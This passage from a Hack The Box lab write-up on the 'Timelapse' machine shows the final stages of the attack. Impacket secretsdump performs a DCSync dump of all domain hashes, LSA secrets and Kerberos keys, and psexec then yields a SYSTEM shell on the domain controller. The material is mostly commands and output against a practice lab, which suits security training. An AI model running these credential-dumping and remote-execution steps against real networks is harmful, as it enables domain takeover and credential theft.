DCSync Attack
The credential of the administrator user has been validated upon abusing the ReadLAPSPassword privilege
Leveraging the DCSync privileges of the administrator user, I can dump the entire domain credentials
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ KRB5CCNAME=administrator@dc01.timelapse.htb.ccache impacket-secretsdump timelapse.htb/administrator@dc01.timelapse.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] target system bootkey: 0xd88b7b8c98a711544956c8ac71fbe251
[*] dumping local sam hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:6b16cb063fdaddb773ba256dd72a14b7:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
defaultaccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
timelapse\dc01$:plain_password_hex:d3cfcd5b0ab0c632d5a308195440b45a23c8801499c629d03f782f19b50ced4a6dcb1db1993e44f4b10ee478c8719281d4495d48f5dcaea93e9971d8bdcd764711721d0c21e33a8fff4287cd6be04da5f1f330e441e90430b9cd364620c9d3aba10cbd774ee6137e5598135bea51e32ed131a15fbc8acf0adcc0c8f83ec97449f09f260fd4bcf7fad8f5d3da4733ae02828e4cb9a6068d93bbf4233962efe1610aba33dc04175482a0399625d449b5f4fff18eaf319620e8ccf5f3722edab41a590ddaa7310a69fed7cfa3f913ec59c872e5be2d1306c4e7844ac77760acc656160f06e908aece1f886acba4d9e80a09
timelapse\dc01$:aad3b435b51404eeaad3b435b51404ee:8920cc38eb2bd67e0c6897702cfe53e0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xbc6b4be0de66f262c75df7ae4f7dadf34fa03ddc
dpapi_userkey:0x074fe8860a0fbca40b902c409998b1b9cd332cd1
[*] NL$KM
0000 AE 8C BD 2F 8A B9 48 87 5F F2 1E 2C 42 14 57 5E .../..H._..,B.W^
0010 90 E6 1C AC CD 23 42 26 CE D7 1F B5 D3 7F D6 44 .....#B&.......D
0020 6B 29 7B 58 FF 89 BD A7 45 96 EF 5A 96 B1 E1 07 k){X....E..Z....
0030 1f 71 9d 9d 0f e1 1d 1e 3a 95 dd 4f 13 a9 a6 92 .q......:..O....
nl$km:ae8cbd2f8ab948875ff21e2c4214575e90e61caccd234226ced71fb5d37fd6446b297b58ff89bda74596ef5a96b1e1071f719d9d0fe11d1e3a95dd4f13a9a692
[*] dumping domain credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
administrator:500:aad3b435b51404eeaad3b435b51404ee:fca19cc1e8c21e6b77d48eab75715d9b:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2960d580f05cd511b3da3d3663f3cb37:::
timelapse.htb\thecybergeek:1601:aad3b435b51404eeaad3b435b51404ee:c81875d2b3cd404f3c8eadc820248f06:::
timelapse.htb\payl0ad:1602:aad3b435b51404eeaad3b435b51404ee:f63b1edaad2ee253c3c228c6e08d1ea0:::
timelapse.htb\legacyy:1603:aad3b435b51404eeaad3b435b51404ee:93da975bcea111839cc584f2f528d63e:::
timelapse.htb\sinfulz:1604:aad3b435b51404eeaad3b435b51404ee:72b236d9b0d49860267f752f1dfc8103:::
timelapse.htb\babywyrm:1605:aad3b435b51404eeaad3b435b51404ee:d47c7e33d6911bb742fdf040af2e80da:::
timelapse.htb\svc_deploy:3103:aad3b435b51404eeaad3b435b51404ee:c912f3533b7114980dd7b6094be1a9d8:::
timelapse.htb\trx:5101:aad3b435b51404eeaad3b435b51404ee:4c7121d35cd421cbbd3e44ce83bc923e:::
dc01$:1000:aad3b435b51404eeaad3b435b51404ee:8920cc38eb2bd67e0c6897702cfe53e0:::
db01$:1606:aad3b435b51404eeaad3b435b51404ee:d9c629d35e3311abba1631dba29ead96:::
web01$:1607:aad3b435b51404eeaad3b435b51404ee:3b2910d8e6c79bbb20e8842ea4a9aeac:::
dev01$:1608:aad3b435b51404eeaad3b435b51404ee:463c7639ff204594dfbebbe71b3c6dbb:::
[*] Kerberos keys grabbed
administrator:aes256-cts-hmac-sha1-96:07e1a777446797f503e524603b52514bf713687edc1db6f83ef6151f895bb82f
administrator:aes128-cts-hmac-sha1-96:6bce210b2a8d00063e1665358a95f891
administrator:des-cbc-md5:07da75cb45380175
krbtgt:aes256-cts-hmac-sha1-96:ae4798139ee96d519e7c4678bb77986e2aaa227773b2dfa8d5908f19710a5d5f
krbtgt:aes128-cts-hmac-sha1-96:6a29eb8152bd9e373bb8512a18cbc029
krbtgt:des-cbc-md5:459876d080fd102c
timelapse.htb\thecybergeek:aes256-cts-hmac-sha1-96:1ce6ed23ae74f98e9fb4492b1d6da4abd53050cec84690dba0947da6f5072f7f
timelapse.htb\thecybergeek:aes128-cts-hmac-sha1-96:c9afa87f35f474a9111d52234ece52f6
timelapse.htb\thecybergeek:des-cbc-md5:c83e677c0e376238
timelapse.htb\payl0ad:aes256-cts-hmac-sha1-96:6588d1e91e012cfe69932d2f80f1d55d77b224822472021902735d70bab836dc
timelapse.htb\payl0ad:aes128-cts-hmac-sha1-96:527f8211d77499d99df13c572d4553c0
timelapse.htb\payl0ad:des-cbc-md5:25adceec4c613bb0
timelapse.htb\legacyy:aes256-cts-hmac-sha1-96:710b7e9c9374e4e306e6a9e599ae5f615f4e3e1acabb8a9183ef1d5358a46143
timelapse.htb\legacyy:aes128-cts-hmac-sha1-96:60adfce798b2431f2dee6993b119d591
timelapse.htb\legacyy:des-cbc-md5:160be04ae694e661
timelapse.htb\sinfulz:aes256-cts-hmac-sha1-96:9ce922adc954b7671fea5ff4f68ee1a00ccd18747856cefdfeb6b695dfa2c73b
timelapse.htb\sinfulz:aes128-cts-hmac-sha1-96:504fe2766f85d602ed947ee21f4e0c4e
timelapse.htb\sinfulz:des-cbc-md5:04cedc589234b97a
timelapse.htb\babywyrm:aes256-cts-hmac-sha1-96:98231e7161d5bcdb1db93ab0bf989434e6a6c6d86cfe10977a15eae461b29836
timelapse.htb\babywyrm:aes128-cts-hmac-sha1-96:e591049c737616153abafe43b68fa0e6
timelapse.htb\babywyrm:des-cbc-md5:316ebf795b52ea43
timelapse.htb\svc_deploy:aes256-cts-hmac-sha1-96:10cb46d648b9cc5774fd381c0b43e91c271ec59dada000b01c7ab3f4e614ddd1
timelapse.htb\svc_deploy:aes128-cts-hmac-sha1-96:33493640af7e815f2ecfbf59d9dedcee
timelapse.htb\svc_deploy:des-cbc-md5:c80edfb0ea262613
timelapse.htb\trx:aes256-cts-hmac-sha1-96:61d799ac74cd09e38786fcda8196705477b7871c15e0cd828849530783f2c93d
timelapse.htb\trx:aes128-cts-hmac-sha1-96:6948c570d61f5a3c9a941524a809eb3f
timelapse.htb\trx:des-cbc-md5:269468abe01329ad
dc01$:aes256-cts-hmac-sha1-96:c77912a1e16ba439c1488a553f7ea0ba63834ef5254c01c0524d21c1735e751c
dc01$:aes128-cts-hmac-sha1-96:4ed4772058d5faa3271dd6545ae199a3
dc01$:des-cbc-md5:04c43b8ffe0d1c04
db01$:aes256-cts-hmac-sha1-96:c03fda84ab460db1f0ae9ecc0cd17c9fab52576ac6a4c77df1f600d4b10e0088
db01$:aes128-cts-hmac-sha1-96:eb8af7494d9cc8e29e9b84923e929410
db01$:des-cbc-md5:5e9ddae537abe631
web01$:aes256-cts-hmac-sha1-96:f9655daa1066e543b94469ac5657d747fb17c9679bb4250efaa1eae177ff285a
web01$:aes128-cts-hmac-sha1-96:0a280a2ad97136959ac408c62450b0ed
web01$:des-cbc-md5:4fcef1e6b30b68f7
dev01$:aes256-cts-hmac-sha1-96:06278ffadea2d29dd059f4535284735d0dce00b81c74dfff24a1a679bff976b5
dev01$:aes128-cts-hmac-sha1-96:da52c69d83ea6c19c7c8a3b19a545a68
dev01$:des-cbc-md5:f229a754ec46c2e3
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] scmr sessionerror: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistryDomain Level Compromise
Shell Drop
┌──(kali㉿kali)-[~/archive/htb/labs/timelapse]
└─$ KRB5CCNAME=administrator@dc01.timelapse.htb.ccache impacket-psexec timelapse.htb/administrator@dc01.timelapse.htb -no-pass -k -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on dc01.timelapse.htb.....
[*] Found writable share ADMIN$
[*] Uploading file jxVfkOwS.exe
[*] Opening SVCManager on dc01.timelapse.htb.....
[*] Creating service MpAh on dc01.timelapse.htb.....
[*] Starting service MpAh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2686]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
dc01
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::245
IPv6 Address. . . . . . . . . . . : dead:beef::cc93:dbe2:8401:964
Link-local IPv6 Address . . . . . : fe80::cc93:dbe2:8401:964%13
IPv4 Address. . . . . . . . . . . : 10.10.11.152
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%13
10.10.10.2System Level Compromise